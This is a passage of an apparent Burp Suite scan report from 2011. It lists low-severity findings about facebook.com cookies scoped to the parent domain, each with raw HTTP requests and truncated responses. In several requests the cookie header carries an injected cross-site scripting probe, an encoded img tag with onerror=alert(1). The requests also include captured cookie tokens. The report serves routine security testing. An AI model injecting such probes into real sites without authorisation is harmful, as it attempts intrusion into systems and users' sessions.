Date: Thu, 05 May 2011 11:42:29 GMT
Content-Length: 47590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.89. http://www.facebook.com/share.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /share.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /share.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.25.111
Connection: close
Date: Thu, 05 May 2011 10:56:46 GMT
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.90. http://www.facebook.com/sharer.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.32.111
Connection: close
Date: Thu, 05 May 2011 10:56:48 GMT
Content-Length: 10419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.91. http://www.facebook.com/skdarealist

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /skdarealist

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fskdarealist; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /skdarealist HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fskdarealist; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.81
Connection: close
Date: Thu, 05 May 2011 11:42:27 GMT
Content-Length: 115848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.92. http://www.facebook.com/sportingnews

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sportingnews

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sportingnews HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.141.21
Connection: close
Date: Thu, 05 May 2011 11:41:49 GMT
Content-Length: 197753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.93. http://www.facebook.com/stefanoboscolomarchi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /stefanoboscolomarchi

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fstefanoboscolomarchi; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /stefanoboscolomarchi HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fstefanoboscolomarchi; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.199.47
Connection: close
Date: Thu, 05 May 2011 11:42:33 GMT
Content-Length: 145632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.94. http://www.facebook.com/techcrunch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /techcrunch

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /techcrunch HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.25
Connection: close
Date: Thu, 05 May 2011 11:42:19 GMT
Content-Length: 39532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.95. http://www.facebook.com/terms.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /terms.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /terms.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.4.129
Connection: close
Date: Thu, 05 May 2011 10:56:50 GMT
Content-Length: 44062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.96. http://www.facebook.com/theteebers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /theteebers

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ftheteebers; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /theteebers HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ftheteebers; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.23
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 67960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.97. http://www.facebook.com/wmoppert

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /wmoppert

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fwmoppert; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wmoppert HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fwmoppert; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.45
Connection: close
Date: Thu, 05 May 2011 11:42:10 GMT
Content-Length: 39263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.98. https://www.facebook.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.195.126
Connection: close
Date: Thu, 05 May 2011 11:43:17 GMT
Content-Length: 30968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.99. https://www.facebook.com/ajax/intl/language_dialog.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /ajax/intl/language_dialog.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/intl/language_dialog.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.20.120
Connection: close
Date: Thu, 05 May 2011 10:56:54 GMT
Content-Length: 40729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.100. https://www.facebook.com/h02332

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /h02332

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • lsd=bnJmV; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h02332 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=bnJmV; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.47
X-Cnection: close
Date: Thu, 05 May 2011 12:37:53 GMT
Content-Length: 14457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.101. https://www.facebook.com/h02332

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /h02332

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
  • reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /h02332 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.facebook.com/h02332
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-; lsd=T19_s
Content-Type: application/x-www-form-urlencoded
Content-Length: 779

post_form_id=76bac92d00ddc3f918cce3ae87a1177e&lsd=T19_s&captcha_persist_data=AQBeontrT_F0tu7Ahqufh0Nz_L57GC3z01jTVMayUpXS3RtmLp7gUAIWBcPgu66CfwG3bDSmtoZxxdfxY8Wj0BFJoRTL5R9qmmmGtfS7XvxLkrDktAk6_X9BzWt
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.185.122
X-Cnection: close
Date: Thu, 05 May 2011 12:38:10 GMT
Content-Length: 40951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.102. https://www.facebook.com/h02332

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /h02332

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h02332 HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
